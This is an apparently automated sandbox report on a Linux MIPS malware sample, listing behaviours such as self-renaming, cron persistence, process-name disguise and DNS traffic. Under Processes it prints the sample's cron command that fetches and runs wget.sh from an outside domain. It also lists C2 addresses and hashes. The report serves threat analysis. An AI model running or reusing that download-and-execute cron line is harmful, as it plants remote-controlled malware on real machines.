Malware Analysis Report

2024-11-15 08:23

Sample ID: 241028-bgxvlatrcv
Target:    2bc1855eb4297c28116e412b6705e14a.bin
SHA256:    9cb34a4c41186002a0d523d847cf95c4e099ac6c61a03888ad9e58e303be1d8f
Tags:      defense_evasion discovery execution persistence privilege_escalation
Score:     7/10

Table of Contents

  Analysis Overview
  MITRE ATT&CK
    Enterprise Matrix V15
  Analysis: static1
    Detonation Overview
    Signatures
  Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score:  7/10
SHA256: 9cb34a4c41186002a0d523d847cf95c4e099ac6c61a03888ad9e58e303be1d8f

Threat Level: Shows suspicious behavior

The file 2bc1855eb4297c28116e412b6705e14a.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

Tags: defense_evasion discovery execution persistence privilege_escalation

Renames itself

Unexpected DNS network traffic destination

File and Directory Permissions Modification

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-10-28 01:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted:        2024-10-28 01:07
Reported:         2024-10-28 01:10
Platform:         debian9-mipsbe-20240611-en
Max time kernel:  150s
Max time network: 149s

Command Line

[/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf]

Signatures

File and Directory Permissions Modification

Tactics: defense_evasion

Description | Indicator | Process | Target
N/A | N/A | /bin/sh | N/A

Renames itself

Description | Indicator | Process | Target
N/A | N/A | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A

Unexpected DNS network traffic destination

Description | Indicator | Process | Target
Destination IP | 139.84.165.176 | N/A | N/A
Destination IP | 185.181.61.24 | N/A | N/A

Creates/modifies Cron job

Tactics: execution persistence privilege_escalation

Description | Indicator | Process | Target
File opened for modification | /var/spool/cron/crontabs/tmp.22OlBk | /usr/bin/crontab | N/A

Changes its process name

Description | Indicator | Process | Target
Changes the process name, possibly in an attempt to hide itself | mini_httpd | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A

Reads runtime system information

Tactics: discovery

Description | Indicator | Process | Target
File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A
File opened for reading | /proc/mounts | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/724/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/730/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/718/cmdline | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/725/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/708/cmdline | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/727/cmdline | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A
File opened for reading | /proc/727/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/1/cmdline | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/728/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/729/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/731/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/726/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/2/cmdline | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A

Processes

/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
  [/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf]

/bin/sh
  [sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab
  [crontab -]

/usr/bin/crontab
  [crontab -l]

Network

Country  Destination            Domain                  Proto
IN       139.84.165.176:53      kingstonwikkerink.dyn   udp
NO       185.181.61.24:53       kingstonwikkerink.dyn   udp
GB       91.149.238.18:15088    kingstonwikkerink.dyn   tcp

Files

/var/spool/cron/crontabs/tmp.22OlBk

MD5:    7f870874f6e2e8a519bfb12fd9595bae
SHA1:   a06aa499becd5f448356d6dcd76441142f5f4142
SHA256: 09cfd32d5d70dceebe59d6eecc03de39f65428f59b214c62dea20d331085c51d
SHA512: f05c5887976e1e645d3b82d48f1492b24ef680e54483625d8eecc912ea4d38c36db62d9296bff4e3b1f418e7e50cde9c5083d685e77860c61372b19a6c06d620